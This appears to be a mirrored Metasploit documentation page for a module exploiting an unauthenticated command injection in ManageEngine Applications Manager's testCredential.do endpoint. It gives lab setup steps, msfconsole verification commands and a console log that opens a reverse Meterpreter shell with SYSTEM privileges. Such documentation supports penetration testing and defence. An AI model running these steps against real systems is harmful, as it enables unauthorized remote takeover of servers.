Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md
21665 views

Vulnerable Application

This module exploits command injection vulnerability in the ManageEngine Applications Manager product. An unauthenticated user can execute a operating system command under the context of privileged user. Publicly accessible testCredential.do endpoint takes multiple user inputs and validates supplied credentials by accessing given system. This endpoint calls a several internal classes and then executes powershell script without validating user supplied parameter when the given system is OfficeSharePointServer.

Vulnerable Application Installation Steps

Go to following website and download Windows version of the product. It comes with built-in Java and Postgresql so you don't need to install anything else. http://archives.manageengine.com/applications_manager/13630/

Verification Steps

A successful check of the exploit will look like this:

  • Start msfconsole

  • use exploit/windows/http/manageengine_appmanager_exec

  • Set RHOST <RHOST>

  • Set PAYLOAD windows/meterpreter/reverse_tcp

  • Set LHOST <LHOST>

  • Run check

  • Verify that you are seeing The target is vulnerable. in console.

  • Run exploit

  • Verify that you are seeing Triggering the vulnerability in console.

  • Verify that you are seeing Sending stage to <TARGET> in console.

  • Verify that you have your shell.

Scenarios

msf > 
msf > use exploit/windows/http/manageengine_appmanager_exec 
msf exploit(windows/http/manageengine_appmanager_exec) > set RHOST 12.0.0.192
RHOST => 12.0.0.192
msf exploit(windows/http/manageengine_appmanager_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/http/manageengine_appmanager_exec) > set LHOST 12.0.0.1
LHOST => 12.0.0.1
msf exploit(windows/http/manageengine_appmanager_exec) > check
[+] 12.0.0.192:9090 The target is vulnerable.
msf exploit(windows/http/manageengine_appmanager_exec) > run

[*] Started reverse TCP handler on 12.0.0.1:4444 
[*] Triggering the vulnerability
[*] Sending stage (179779 bytes) to 12.0.0.192

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM